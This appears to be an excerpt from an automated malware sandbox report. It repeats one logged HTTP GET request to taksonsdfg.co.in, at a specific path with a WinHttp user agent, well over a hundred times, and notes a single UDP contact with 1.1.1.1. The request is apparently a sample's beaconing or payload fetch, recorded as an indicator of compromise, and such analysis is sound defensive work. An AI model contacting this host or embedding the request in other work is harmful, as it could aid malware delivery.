      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
